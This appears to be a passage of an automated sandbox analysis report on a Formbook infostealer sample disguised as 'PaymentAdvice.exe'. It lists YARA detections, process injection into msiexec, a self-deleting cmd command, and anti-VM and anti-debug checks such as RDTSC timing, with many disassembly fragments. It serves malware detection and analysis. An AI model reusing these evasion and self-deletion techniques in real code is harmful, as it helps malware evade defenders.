          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@13/10
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:844:120:WilError_01
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile created: C:\Users\user\AppData\Local\Temp\nsj41C3.tmpJump to behavior
          Source: PaymentAdvice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PaymentAdvice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PaymentAdvice.exeVirustotal: Detection: 32%
          Source: PaymentAdvice.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile read: C:\Users\user\Desktop\PaymentAdvice.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Users\user\Desktop\PaymentAdvice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: msiexec.pdb source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: msiexec.pdbGCTL source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\78a9904c70914141b6b07ca4fbdcf1ff\Loader\Loader\Release\u58v4wo87.pdb source: PaymentAdvice.exe, 00000000.00000002.238262176.0000000073CA2000.00000002.00020000.sdmp, ic4muy4.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: PaymentAdvice.exe, 00000000.00000003.229993167.000000001F100000.00000004.00000001.sdmp, PaymentAdvice.exe, 00000002.00000002.278191881.00000000009D0000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.502133269.0000000004610000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PaymentAdvice.exe, msiexec.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PaymentAdvice.exeUnpacked PE file: 2.2.PaymentAdvice.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041D047 push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041C9DA push cs; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00415326 push esi; iretd
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041CBB8 push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041CC3C push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041C4C5 push ss; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041CCCB push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041CD5D push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_0041CF9B push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A4D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041D047 push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041C9DA push cs; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_00415326 push esi; iretd
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041CBB8 push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041CC3C push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041C4C5 push ss; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041CCCB push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_1_0041CD5D push esp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0468D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0039D047 push esp; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0039C9DA push cs; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_00395326 push esi; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0039CBB8 push esp; ret
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile created: C:\Users\user\AppData\Local\Temp\nse41F3.tmp\ic4muy4.dllJump to dropped file
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PaymentAdvice.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PaymentAdvice.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000003885E4 second address: 00000000003885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 000000000038896E second address: 0000000000388974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PaymentAdvice.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6536Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6392Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.264236200.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.264236200.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.506521767.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.254877403.00000000053A0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000003.00000002.512492029.00000000053BD000.00000004.00000001.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60101-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 00000003.00000002.496017525.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000003.00000000.264288916.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000002.512526929.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.264288916.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000003.00000000.263844021.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,GetMessageA,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_02671664 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_0267187C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00AC1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A22990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A14120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_00A1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 2_2_009FB171 mov eax, dword ptr fs:[00000030h]
